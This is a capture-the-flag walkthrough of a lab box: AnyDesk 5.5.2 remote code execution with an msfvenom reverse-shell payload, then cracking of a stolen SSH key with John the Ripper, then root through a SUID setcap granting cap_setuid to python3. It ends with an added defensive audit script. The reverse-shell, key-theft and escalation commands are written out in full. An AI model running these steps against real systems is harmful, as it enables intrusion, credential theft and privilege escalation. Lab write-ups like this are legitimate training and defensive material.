Started with a quick rustscan and found 3 open ports:
sudo rustscan -a <target-ip> -- -sC -sV -T4 -vv -oN Annie_nmap
In the scan results I observed an AnyDesk client running on port 7070. This gave me a hint that it might be the point of initial access.
I quickly searched Google for an AnyDesk 7070 exploit and got these results:
Since I didn't have any version info, I went with the first search result, provided by Exploit-DB for version 5.5.2, ref:
This gave us the Python exploit for remote code execution:
As per the exploit, we have to create our own shellcode with msfvenom, so I created my own:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
After a lot of trial and error, several LPORT changes and many room resets, I finally received my connection on port 7070, on which AnyDesk is running.
I received the connection as user "Annie": (pwn3d!🙂)
Now it's time to upgrade and stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg (and press enter)
And I got the user flag in Annie's home directory.
In Annie's home folder I found a ".ssh" folder where Annie's private key is saved as 'id_rsa', so I copied it to my machine and tried to SSH, but it failed as it was asking for a passphrase.
So I quickly used the John the Ripper helper "ssh2john" to convert the id_rsa file into John the Ripper format and tried to crack it. Within a few seconds I was able to crack it.
I started with manual enumeration, like checking the sudo version, cron jobs, sudo permissions etc. But I found something unusual in the SUID list: there is something called "/sbin/setcap".
find / -perm -4000 -type f 2>/dev/null
I quickly searched for "setcap priv esc" and landed on this page:
As per the blog, if we have permission to set capabilities then we can change the capabilities of python3 (as an example) and get root privileges.
So for the priv esc I followed the blog and copied the python3 binary to the /tmp folder:
cp /usr/bin/python3 /tmp
Then changed the capabilities of that python3 file:
setcap cap_setuid+ep /tmp/python3
And ran python3 to set my uid to 0 and execute a bash shell:
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
This gave me root privileges: (pwn3d!🙂)
After successful execution I got the root flag in the root folder.
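For the defending side, the two conditions this escalation depended on (a SUID /sbin/setcap, and a binary carrying cap_setuid) are both easy to audit. The script below is an added example and not part of the original writeup; it filters the output of `getcap -r /` and of the SUID `find` shown above, and the sample lines are constructed rather than taken from the room.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup): flags the two
# conditions the walkthrough relied on for privilege escalation.
#   1. a file whose capability set includes cap_setuid/cap_setgid
#      (e.g. a python3 copy after `setcap cap_setuid+ep`)
#   2. setcap itself (or capsh) carrying the SUID bit, which lets any
#      user grant such capabilities
# Both functions read one entry per line on stdin and print the matches,
# so on a live host they can be fed from
#   getcap -r / 2>/dev/null | flag_uid_caps
#   find / -perm -4000 -type f 2>/dev/null | flag_suid_capability_tools

# flag_uid_caps: filters getcap output ("/path cap_x=ep" on newer libcap,
# "/path = cap_x+ep" on older ones) for entries that can change uid/gid.
flag_uid_caps() {
    while IFS= read -r entry; do
        [ -n "$entry" ] || continue
        path=${entry%% *}        # first field is the file path
        caps=${entry#"$path"}    # remainder is the capability list
        case "$caps" in
            *cap_setuid*|*cap_setgid*) printf '%s\n' "$path" ;;
        esac
    done
}

# flag_suid_capability_tools: filters a SUID file list for binaries that
# manage capabilities and should never be SUID.
flag_suid_capability_tools() {
    while IFS= read -r path; do
        case "${path##*/}" in
            setcap|capsh) printf '%s\n' "$path" ;;
        esac
    done
}

# Constructed sample data (not captured from a real host).
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/tmp/python3 cap_setuid=ep
/usr/bin/mtr-packet = cap_net_raw+ep'
SAMPLE_SUID='/usr/bin/passwd
/sbin/setcap
/usr/bin/sudo'

printf '%s\n' "$SAMPLE_GETCAP" | flag_uid_caps              # /tmp/python3
printf '%s\n' "$SAMPLE_SUID" | flag_suid_capability_tools   # /sbin/setcap
```

Any hit from either function is worth a ticket: a non-root user should not be able to run setcap, and nothing outside a known allow-list should carry cap_setuid.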